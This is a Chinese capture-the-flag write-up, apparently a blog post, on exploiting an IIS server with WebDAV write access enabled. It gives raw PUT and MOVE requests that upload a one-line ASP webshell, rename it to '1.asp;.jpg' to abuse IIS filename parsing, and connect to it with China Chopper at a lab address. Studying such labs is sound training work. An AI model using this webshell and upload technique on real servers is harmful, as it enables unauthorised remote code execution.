CTF-IIS写权限漏洞分析溯源

本文深入探讨了由于服务器配置不当引发的IIS写权限漏洞,重点介绍了如何利用IIS PUT Scanner进行扫描。通过修改HTTP请求为OPTIONS,发现服务器允许PUT和MOVE操作。进一步利用PUT方法写入一句话木马,并通过rename技巧将文件变为1.asp;.jpg,最终通过菜刀连接获取关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据题意
在这里插入图片描述
原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了
webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
用burp抓包修改写入,修改GET为OPTIONS
在这里插入图片描述
发现Allow部分有PUT和MOVE
然后利用PUT写入一句话木马到一个文件里面
更改或增加以下
PUT /2.txt HTTP/1.1
<%eval request(“cmd”)%>
在这里插入图片描述
返回不是bad request或者404就行
更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg,burp写入
更改或增加以下
MOVE /2.txt HTTP/1.1
Destination: /1.asp;.jpg
<%eval request(“tdl”)%>
在这里插入图片描述
返回401,不影响
菜刀连接,地址:http://219.153.49.228:44601/1.asp;.jpg密码:cmd,获得key
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值